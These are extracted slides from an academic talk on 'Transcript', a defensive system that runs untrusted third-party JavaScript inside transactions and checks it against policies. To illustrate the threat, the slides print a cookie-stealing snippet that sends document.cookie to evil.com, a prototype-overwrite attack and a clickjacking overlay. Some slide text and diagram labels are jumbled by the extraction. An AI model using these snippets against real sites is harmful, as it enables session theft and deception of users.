Enhancing JavaScript
with Transactions
Mohan Dhawan†, Chung-chieh Shan‡
and Vinod Ganapathy†
†Department
of Computer Science, Rutgers University
‡School of Informatics and Computing, Indiana University
Problem

Web applications include third party content


Examples: widgets, advertisements, libraries
May contain untrusted, malicious JavaScript
Example from nytimes.com

Rogue third party advertisement


Displayed image of fake virus scan
Client security and privacy at risk
Solution: Transcript

Extend JavaScript to support Transactions

Execute untrusted content speculatively
Web
Application

Transaction
Commit changes after policy enforcement
Goal

Protect the Web application from security
violating actions of untrusted JavaScript

Must handle arbitrary third party code written in
JavaScript


Including constructs such as eval, this, with.
Must enforce powerful security policies


Allow pop-ups from white-listed websites only.
Dis-allow innerHTML in the context of host Web
application.
Contributions

JavaScript transactions


Transaction suspend/resume


Speculative execution of unmodified third party
JavaScript code
Allow host Web application to mediate external
actions like DOM and AJAX operations
Speculative DOM updates
Schematic use of Transcript
// Web application code
var tx = transaction{
Web
Application
Transaction
...
// unmodified 3rd party code
...
};
// Introspection block goes below
/* policy enforcement code */
// validate actions of the transaction
tx.commit();
//Rest of the Web application code
Example: Untrusted code
Web
// Web application code
Application
var tx = transaction{
var image =
Transaction
document.createElement("img");
var url =
"http://evil.com/grabcookie.php";
var params = document.cookie;
image.src = url + "?cookie=" + params;
document.body.appendChild(image);
...
Array.prototype.join = function() {
return "evilString"; };
};
Transcript Runtime
Transcript runtime system
Web application code
…
tx = transaction {
...
body.appendChild(image);
...
};
1
2
Introspection block
do {
3
...
tx = tx.resume();
4
...
} while(tx.isSuspended());
5
tx.commit();
…
Rest of the Web application
March 19, 2016
6
1
Transaction object tx
DOMTX
4
5
3 DOMorig3rd party DOM
2
1
TX
TX
Clone
3rd-party
sets
R/W sets
3rd party
DOMTX call stack R/W
call
stack
resume
appendChild
call stack
DOM’
TX
web app*
app
web
app*
Transcript
clones the host’s web
DOM
…
… +
…
when the transaction starts.
On aimage
transaction suspend, the
Transcript runtime saves all the
tx’s write
Transcript
runtime loads the saved
+
Heaporig
Heap
i)
read
write
sets
, block, the
new
In
the
introspection
host
set
read write sets and stack frames
ii) speculative
DOM(appendChild)
, and
performs
the action
when
the transaction
resumes.
iii)behalf
stack of
frames
till the nearest
on
the guest.
DOM’TX to create
DOMa
transaction delimiter
new
Transaction object
9
Transaction suspend and resume
var tx = transaction{
Web
Application
Transaction
...
document.body.appendChild(image);
};
do{
var rs = tx.getReadSet(), arg = tx.getArgs();
switch(tx.getCause()) {
case "appendChild":
Policy
if
(!(arg[0].nodeName.match("IMG")
&&
if (arg[0].nodeName.match("IMG")
&&
rs.checkMembership(document,"cookie"))
!rs.checkMembership(document,"cookie"))
obj.appendChild(arg[0]);
obj.appendChild(arg[0]);
break; }; /* end switch */
tx = tx.resume();
}while(tx.isSuspended());
Read and Write Sets
var tx = transaction{
Web
Application
...
Transaction
Array.prototype.join = function() {
return "evilString"; };
};
/* Introspection Code */
var ws = tx.getWriteSet();
Policy
if(ws.checkMembership(Array.prototype, "*")
var ws = tx.getWriteSet();
{
if(ws.checkMembership(Array.prototype,
"*")){
to_commit = false;
} to_commit = false;
}
// Rest of the web application code
Gluing
var tx = transaction{
Web
Application
...
Transaction
document.write(‘<script src=
“newcode.js”></s’ + ‘cript>’);
};
// Introspection block
// Rest of the web application code
Implementation


Prototype implementation in Firefox 3.7a4
Added new JavaScript features


Modified SpiderMonkey op-codes to



transaction keyword and Transaction object
Log all object accesses
Suspend on DOM / AJAX calls
Added speculative execution support for
DOM operations

Re-direct all node accesses to the cloned copy
Evaluation

Goals




Study applicability of Transcript in isolating real guest
code
Measure performance impact on guest code and microbenchmarks
Demonstrate graceful recovery in presence of malicious
and buggy guests
Methodology


Isolated the guest code in a Web application using
transactions
Introspection block for each transaction enforced a
number of general and domain specific policies
March 19, 2016
14
Applicability of Transcript

Applied Transcript on five JavaScript widgets and
applications

Stand-alone and library based
Benchmarks

Policies
JS Menu
No network or cookie access
Picture Puzzle
Disallow attaching key event handlers
Spell Checker
No XMLHttpRequest if cookies were read
GreyBox
iframes to whitelisted URLs only
Color Picker
No innerHTML in host’s context
No difference in behavior and functionality
March 19, 2016
15
Performance - Application benchmarks
Overhead = 0.16s
March 19, 2016
16
Performance – Microbenchmarks
(Function calls)
MicroBenchmark
Overhead
Native Functions
eval(“if (true) true; false;”)
6.87x
fn.call(this, i)
1.89x
External Operations
getElementById(“checkbox”)
6.78x
createElement(“div”)
3.69x
addEventListener(“click”, clk, false)
26.51x
dispatchEvent(evt)
1.20x
document.write(“<script>x = 1;</script>”)
2.01x
document.write(“<b> Hi </b>”)
1.26x
March 19, 2016
17
Performance – Microbenchmarks
(JavaScript Events)
Event name
Overhead
Normalized Raw delay(µs)
Drag event (drag)
1.71x
97
Keyboard event (keypress)
1.16x
150
Message event (message)
1.17x
85
Mouse event (click)
1.54x
86
Mouse event (mouseover)
2.05x
88
Mutation event (DOMAttrModified)
2.14x
88
UI Event (overflow)
1.97x
61
Average overhead of just 94μs per event.
March 19, 2016
18
Recovery

Clickjacking
document.write(`<div style="z-index:-1; ...other
size/loc params"> <a href="http://www.amazon.com">
Goto Amazon </a> </div>');
...
document.write(`<div style="opacity: 0.0; zindex:0; ...same size/loc params"> <a
href="http://evil.com"> Goto Amazon </a> </div>');
March 19, 2016
19
Related Work

Staged information flow in JavaScript: PLDI'09


Conscript: S&P'10


aspect-oriented framework to specify and enforce finegrained security policies for Web applications
AdJail: Security'10


hybrid framework for JavaScript with the aim of protecting
Web applications from untrusted code
isolation mechanism to protect Web application content
from malicious advertisements
Caja, FBJS, AdSafe, etc.
Conclusion

Transcript implements JavaScript transactions
to provide isolation and recovery

Suspend operations that break isolation


Enforcement of powerful security policies



Resume operation if web application allows
All data reads / writes are recorded
Ability to inspect reads / writes before commit
No restriction or changes to third party code
Questions ?